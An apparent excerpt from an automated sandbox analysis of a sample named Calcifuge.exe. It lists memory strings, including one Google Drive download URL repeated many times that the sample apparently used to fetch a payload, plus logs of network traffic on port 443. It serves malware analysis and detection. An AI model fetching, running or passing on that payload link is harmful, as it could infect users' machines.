      Source: Calcifuge.exe, 00000006.00000003.2548755171.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423966470.000000000239B000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000002.2918740581.0000000002389000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469322168.000000000239D000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560467511.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480466093.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2503220096.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457842800.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171207372.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400372513.000000000239B000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446693739.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2514911101.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2435085911.000000000239B000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2412221349.000000000239D000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537547087.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526085908.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388099706.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492229148.000000000239C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadE
      Source: Calcifuge.exe, 00000006.00000003.2858493124.0000000002406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadF
      Source: Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadL
      Source: Calcifuge.exe, 00000006.00000003.2354280559.0000000002406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadY
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2880880177.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000002.2918854097.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2640013882.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2662875760.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2698191444.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2617552588.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2846865249.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2629105429.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadZ
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2846865249.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2756335026.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2858542036.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2767990267.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2779106940.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2801689509.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloada
      Source: Calcifuge.exe, 00000006.00000003.2685190065.0000000002406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadd
      Source: Calcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloade
      Source: Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457734111.00000000023B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadel
      Source: Calcifuge.exe, 00000006.00000003.2801689509.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadid
      Source: Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2148548358.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2342872885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2320749731.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2136830469.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadp
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadt
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadz
      Source: Calcifuge.exe, 00000006.00000003.2320675869.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252231902.000000000240F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadzR
      Source: Calcifuge.exe, 00000006.00000003.2571402123.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/w&
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: powershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: Calcifuge.exe, 00000006.00000003.2674238544.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2801648990.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2114052097.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720728205.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2102880515.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457672683.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2514842468.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023FA000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2916937010.00000000023F9000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457734111.00000000023FA000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2136830469.00000000023AE000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023FA000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2102880515.00000000023AE000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252231902.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2125585019.00000000023AE000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2514790194.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332116725.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240637049.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2377017569.00000000023FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: Calcifuge.exe, 00000006.00000003.2674238544.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2801648990.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2114052097.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720728205.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2102880515.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457672683.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2514842468.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023FA000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2916937010.00000000023F9000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457734111.00000000023FA000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2136830469.00000000023AE000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023FA000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2102880515.00000000023AE000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252231902.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2125585019.00000000023AE000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2514790194.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332116725.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240637049.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2377017569.00000000023FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: Calcifuge.exe, 00000006.00000003.2674238544.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2801648990.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2114052097.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720728205.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2102880515.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457672683.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2514842468.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023FA000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2916937010.00000000023F9000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457734111.00000000023FA000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2136830469.00000000023AE000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023FA000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2102880515.00000000023AE000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252231902.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2125585019.00000000023AE000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2514790194.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332116725.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240637049.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2377017569.00000000023FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: Calcifuge.exe, 00000006.00000003.2720820376.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comT
      Source: Calcifuge.exe, 00000006.00000003.2332167352.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2320749731.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2342872885.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388023562.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2377017569.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comZ
      Source: Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53609
      Source: unknownNetwork traffic detected: HTTP traffic on port 53463 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53595 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53683
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53602
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53568
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53722
      Source: unknownNetwork traffic detected: HTTP traffic on port 53778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53691
      Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 53500 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 53787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53618
      Source: unknownNetwork traffic detected: HTTP traffic on port 53511 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53459
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53578
      Source: unknownNetwork traffic detected: HTTP traffic on port 53666 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53635 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53469 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53462
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53461
      Source: unknownNetwork traffic detected: HTTP traffic on port 53578 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53460
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53626
      Source: unknownNetwork traffic detected: HTTP traffic on port 53650 -> 443
